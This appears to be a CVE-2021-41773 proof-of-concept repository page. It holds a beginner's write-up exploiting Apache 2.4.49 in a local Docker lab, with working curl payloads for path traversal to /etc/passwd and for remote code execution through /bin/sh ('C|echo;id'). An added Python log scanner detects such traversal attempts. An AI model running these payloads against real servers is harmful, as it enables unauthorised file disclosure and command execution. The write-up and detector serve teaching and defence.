
CVE-2021-41773 PoC — Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49

Associated Vulnerability

Title: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)

Description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.

Readme
# CVE-2021-41773

Hello guys, yesterday the new CVE-2021-41773 for Apache version 2.4.49 was released, so in this post I want to explain this Apache vulnerability.

# Playground
So, I think you guys want to test this vulnerability on a website, so I have a playground for you.
This is the page to download a Docker image of an example Apache 2.4.49: [Docker Image](https://hub.docker.com/r/blueteamsteve/cve-2021-41773/tags)

Note: there are two images, `with-cgid` and `no-cgid`. You need to download both images.

# Usage
First, download the Docker images to your machine.

# Pull Docker Images
```
no-cgid: sudo docker pull blueteamsteve/cve-2021-41773:no-cgid
with-cgid: sudo docker pull blueteamsteve/cve-2021-41773:with-cgid
```

# Run Image
```
no-cgid: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
with-cgid: sudo docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
```
# Disclaimer
Honestly, I don't know how he thought to find this vulnerability, so I can't explain it fully. But I will try my best to talk about everything I understand about this CVE.

# Vulnerability
This CVE is a little interesting because it has two vulnerabilities: `LFD` (**Local File Disclosure**) and `RCE` (**Remote Code Execution**). Cool! So, in this post I will explain both vulnerabilities of this CVE.

# Local-file-disclosure (use the **no-cgid** docker image)
So, let's start with the **Local file disclosure** vulnerability. If you are familiar with Apache, you may know that `cgi-bin` (Common Gateway Interface) is the default path that defines a way for the web server to interact with external content-generating programs in Apache 2.4.49.

But this path is `Forbidden` for everyone, even for the admin. Hmm, interesting, right?

And if you are familiar with **Local file disclosure** vulnerabilities, you might know that most `LFD` vulnerabilities happen in forbidden paths.

So let's test simple LFI payloads in the `/cgi-bin/` path.

I put `../../../../../` before `/etc/passwd`.
(**If you want to know what `../` is, check out this blog post: [Local file disclosure bypass](https://cobalt.io/blog/a-pentesters-guide-to-file-inclusion)**)



With curl:
```
curl http://localhost:8080/cgi-bin/../../../../../etc/passwd
```
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2003-41-37.png)

With Burp Suite:
![burpsuite](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2003-55-53.jpg)

As you can see, we got an error with this simple payload. In curl we got a `404 Not Found` status code, and in Burp we got a `400 Bad Request` error.

That means we should URL-encode our payload. So let's try it and see what we get.

So I URL-encoded the `.`. **Note: `.` is `%2E` (and also `%2e`) in URL encoding.**

With curl:
```
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
```
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-14-44.png)

With Burp:
![Burp](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-23-07.png)

Yes! Our payload works now. We can read the `/etc/passwd` of the website.

So I hope you now understand the `LFD` vulnerability of this CVE. Let's continue to the `RCE` vulnerability of this Apache 2.4.49 CVE.

# Remote-Code-Execution (use the **with-cgid** docker image)
To explain the RCE vulnerability of this CVE, you need to understand some basics of `RCE` and some `Linux basics`.

**Check out this blog post to know [What is RCE](https://www.n-able.com/blog/remote-code-execution)**

Ah, I think you thought I misspoke when I said we need `Linux basics`. Nope, I didn't, because we actually need them. So let's begin!

First let me show the working payload, and then I will explain how it works.
```
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;whoami'
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;id'
```
With Curl:
![curl](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2004-42-23.png)

# Payload-Explain
So let me explain this payload.
```
curl http://localhost:8081/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh -d 'C|echo;id'
```
As you can see, the path **`/cgi-bin/`** and the encoding **`.%2e`** are the same as before. But there are two more options now: `-d` (**data**) and `/bin/sh` (**the shell**). So let me explain why we need these.

# /Bin/Bash
First, we want to get remote code execution, right?

So as you know, on Linux-based systems `/bin/bash` is the main program that executes typed commands and shells. So we need a shell to execute our commands on the web server (the payload above uses `/bin/sh`). Check out this: [What is Bash in linux](https://opensource.com/resources/what-bash).

# Data
Okay, now let's say we can reach `/bin/sh`. We only need to inject our commands. We can send our injection as the request data with curl.

So our payload is `C|echo;id`. Let me explain what this is.

So `C` is nothing; we can put anything we want before the `|`, like `Comdey|`.

The `echo;id` is just a Linux trick (**this is why I said we need Linux basics**): `echo` prints an empty line first, which is what a CGI program has to output before its body, and then `id` runs. [Echo basics](https://www.youtube.com/watch?v=tYmFsyH7VJY)

If we put these together, we get RCE in Apache 2.4.49.
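From the defender's side, both the LFD section and the RCE section above leave the same trace in the Apache access log: a request under the aliased `/cgi-bin/` path whose percent-encoded segments decode to `..` and climb out of that directory. The scanner below is an added example and is not part of the original PoC or of Apache; it URL-decodes each logged request path (repeatedly, so the double-encoded `%252e` form from CVE-2021-42013 is covered too), walks the segments the way a correct normaliser would, and flags any request that escapes the alias. The log lines, the `ALIASED_PREFIXES` list and the regex are constructed for this example; on a real server add every `Alias`/`ScriptAlias` prefix you serve.

```python
import re
from urllib.parse import unquote

# Apache access-log prefix (common/combined format). Constructed regex: it only
# needs to parse the sample lines below, not every possible LogFormat.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# URL prefixes mapped by Alias/ScriptAlias. Assumption: only /cgi-bin/ matters
# on the playground image; a real deployment lists all of its aliased prefixes.
ALIASED_PREFIXES = ("/cgi-bin/",)

# Constructed sample log lines modelled on the requests in the write-up
# (a raw "../" as sent by Burp gets 400; the .%2e form is logged still encoded).
SAMPLE_LOG = [
    '172.17.0.1 - - [08/Oct/2021:03:55:53 +0000] "GET /cgi-bin/../../../../../etc/passwd HTTP/1.1" 400 226 "-" "Mozilla/5.0"',
    '172.17.0.1 - - [08/Oct/2021:04:14:44 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1210 "-" "curl/7.68.0"',
    '172.17.0.1 - - [08/Oct/2021:04:42:23 +0000] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 200 45 "-" "curl/7.68.0"',
    '10.0.0.5 - - [08/Oct/2021:05:00:00 +0000] "GET /cgi-bin/printenv HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [08/Oct/2021:05:00:01 +0000] "GET /cgi-bin/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 200 1210 "-" "curl/7.68.0"',
    '10.0.0.5 - - [08/Oct/2021:05:00:02 +0000] "GET /index.html HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
]


def decode_fully(path: str, max_rounds: int = 3) -> str:
    """Percent-decode until the string stops changing, so both the single
    encoding (.%2e, CVE-2021-41773) and the double encoding (%252e,
    CVE-2021-42013) are reduced to plain dots before normalisation."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def escapes_prefix(raw_path: str, prefix: str) -> bool:
    """True when the decoded request path starts under `prefix` but a '..'
    segment climbs above it, i.e. the request targets something outside
    the aliased directory. The query string is ignored."""
    path = decode_fully(raw_path.split("?", 1)[0])
    if not path.startswith(prefix):
        return False
    depth = 0
    for segment in path[len(prefix):].split("/"):
        if segment == "..":
            depth -= 1
            if depth < 0:          # climbed above the alias root
                return True
        elif segment not in ("", "."):
            depth += 1
    return False


def scan_log(lines):
    """Return one finding per log line whose path escapes an aliased prefix.
    A 2xx status on such a request means the server very likely served the
    file (or ran the program) instead of rejecting the traversal."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m.group("path")
        for prefix in ALIASED_PREFIXES:
            if escapes_prefix(raw, prefix):
                status = int(m.group("status"))
                findings.append({
                    "ip": m.group("ip"),
                    "method": m.group("method"),
                    "path": raw,
                    "decoded": decode_fully(raw.split("?", 1)[0]),
                    "status": status,
                    "outcome": "likely succeeded" if 200 <= status < 300 else "blocked/attempt",
                })
                break
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['decoded']} -> {f['status']} ({f['outcome']})")
```

Run it against a real `access_log` by replacing `SAMPLE_LOG` with the file's lines. A `POST` to a traversed path that resolves to a program such as `/bin/sh` with a 200 response is the pattern to treat as a probable code-execution incident, and a 200 on a traversal to `/etc/passwd` confirms the `require all denied` protection on `/` is missing; either way the fix is upgrading past 2.4.50 and restoring that default.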

# Thanks!
Thanks for reading, guys. This is my first writeup for a CVE. Forgive me if I was bad at explaining this, and please give me suggestions.

![Gif](https://github.com/ComdeyOverFlow/CVE-2021-41773/blob/main/images/Screenshot%20from%202021-10-08%2005-16-30.jpg)
File Snapshot

```
[4.0K] /data/pocs/cc65bebcd975d4e92e9b1c2ccb838dfeccf1d2c5
├── [4.0K] images
│   ├── [ 50K] Screenshot from 2021-10-08 03-41-37.png
│   ├── [331K] Screenshot from 2021-10-08 03-55-53.jpg
│   ├── [126K] Screenshot from 2021-10-08 04-14-44.png
│   ├── [195K] Screenshot from 2021-10-08 04-23-07.png
│   ├── [ 52K] Screenshot from 2021-10-08 04-42-23.png
│   └── [150K] Screenshot from 2021-10-08 05-16-30.jpg
└── [5.5K] README.md

1 directory, 7 files
```